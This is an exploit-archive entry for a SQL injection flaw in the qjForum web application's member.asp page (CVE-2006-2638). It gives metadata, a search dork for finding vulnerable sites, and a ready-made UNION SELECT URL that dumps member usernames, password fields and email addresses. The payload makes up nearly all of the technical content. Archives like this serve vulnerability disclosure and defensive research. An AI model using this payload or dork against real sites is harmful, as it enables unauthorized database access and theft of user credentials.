qjForum - 'member.asp' SQL Injection

Author: ajann
type: webapps
platform: asp
port: 
date_added: 2006-05-25 
date_updated:  
verified: 1 
codes: OSVDB-25786;CVE-2006-2638 
tags: 
aliases:  
screenshot_url:  
application_url: 

# Title  :   qjForum(member.asp) SQL Injection Vulnerability
# Author :   ajann
# greetz :   Nukedx,TheHacker
# Dork   :   "qjForum"
# Exploit:

# Login before injection.

### http://target/[path]/member.asp?uName='union%20select%200,0,0,username,0,0,pd,email,0,0,0,0,0,0,0,0,0,0,0,0%20from%20member

# milw0rm.com [2006-05-26]